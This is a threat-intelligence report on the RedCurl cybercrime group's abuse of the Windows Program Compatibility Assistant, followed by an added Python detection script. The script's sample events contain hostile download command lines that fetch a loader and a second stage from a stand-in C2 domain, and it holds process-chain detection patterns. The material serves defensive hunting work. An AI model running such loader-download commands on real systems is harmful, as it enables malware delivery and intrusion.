RedCurl Cybercrime Group Abuses Windows PCA Tool for Corporate Espionage

Researchers at Trend Micro discovered that the cybercriminal group RedCurl, also known as Earth Kapre and Red Wolf, has been exploiting the Program Compatibility Assistant (PCA), a legitimate Windows component, to carry out malicious activities. Trend Micro’s analysis revealed that RedCurl has been active since at least 2018, targeting entities across various countries including Australia, Canada, Germany, Russia, Slovenia, the U.K., Ukraine, and the U.S. Their modus operandi involves phishing emails containing malicious attachments, typically .ISO and .IMG files, which initiate a multi-stage attack process.

This process starts with the use of cmd[.]exe to download a legitimate utility called curl from a remote server, establishing a channel to deliver a loader. The malicious DLL file then leverages PCA to spawn a downloader process, which establishes a connection with the same domain used by curl to fetch the loader.
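The chain above (cmd.exe launching curl to fetch a loader, then PCA spawning a downloader that reaches back to the same domain) can be hunted for in process-creation telemetry. The following is an added example, not code from Trend Micro or the report; it assumes PCA is invoked through pcalua.exe with its -a switch, and the Sysmon-style events and the c2.example.test domain are constructed samples.

```python
import re
from typing import Dict, List, Tuple

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)

# Constructed Sysmon-style process-creation events; not telemetry from the report.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c curl.exe -o C:\Users\Public\ldr.dll http://c2.example.test/ldr"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Users\Public\ldr.dll http://c2.example.test/ldr"},
    {"parent": r"C:\Windows\System32\rundll32.exe", "image": r"C:\Windows\System32\pcalua.exe",
     "cmdline": r"pcalua.exe -a C:\Users\Public\dl.exe"},  # assumed PCA launcher syntax
    {"parent": r"C:\Windows\System32\pcalua.exe", "image": r"C:\Users\Public\dl.exe",
     "cmdline": r"dl.exe http://c2.example.test/stage2"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Program Files\Git\mingw64\bin\curl.exe",
     "cmdline": r"curl.exe https://updates.example.test/latest"},  # benign: no cmd.exe parent, no PCA follow-up
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def hunt_pca_chain(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return findings in event order: curl downloads launched from cmd.exe, PCA launches,
    and children of pcalua.exe, flagged more strongly when they reuse a curl domain."""
    curl_domains = set()
    findings: List[Tuple[str, str]] = []
    for ev in events:
        img, parent = basename(ev["image"]), basename(ev["parent"])
        match = URL_RE.search(ev["cmdline"])
        domain = match.group(1).lower() if match else None
        if img == "curl.exe" and parent == "cmd.exe" and domain:
            curl_domains.add(domain)            # remember where the loader came from
            findings.append(("curl_via_cmd", domain))
        elif parent == "pcalua.exe":
            # Program Compatibility Assistant spawning a child is the abuse described above.
            tag = "pca_child_same_c2" if domain in curl_domains else "pca_child"
            findings.append((tag, img))
        elif img == "pcalua.exe" and "-a" in ev["cmdline"].lower():
            findings.append(("pca_launch", ev["cmdline"]))
    return findings


if __name__ == "__main__":
    for tag, detail in hunt_pca_chain(SAMPLE_EVENTS):
        print(f"{tag}: {detail}")
```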

Security Officer Comments:
Furthermore, RedCurl employs Impacket, an open-source toolkit, for unauthorized command execution, further complicating detection efforts. Additionally, this development comes as the Russian nation-state group known as Turla has begun employing a new wrapper DLL codenamed Pelmeni to deploy the .NET-based Kazuar backdoor.

Suggested Corrections:
This instance emphasizes the significance of threat intelligence in bridging gaps within investigations, filling missing pieces of evidence that are crucial for comprehensive understanding and protection. Understanding the threat actor behind an attack is paramount for organizations seeking to bolster their defenses.

The role of MDR in uncovering intrusion sets, as demonstrated in this recent incident investigation, exemplifies its critical contribution to cybersecurity. MDR played a key role in attributing the evidence extracted from the attack to the Earth Kapre threat group. This reinforces the essential role of advanced threat detection and response solutions in effectively countering sophisticated threat actors.

Organizations should also consider using a multilayered approach to guard possible entry points into the system (endpoint, email, web, and network).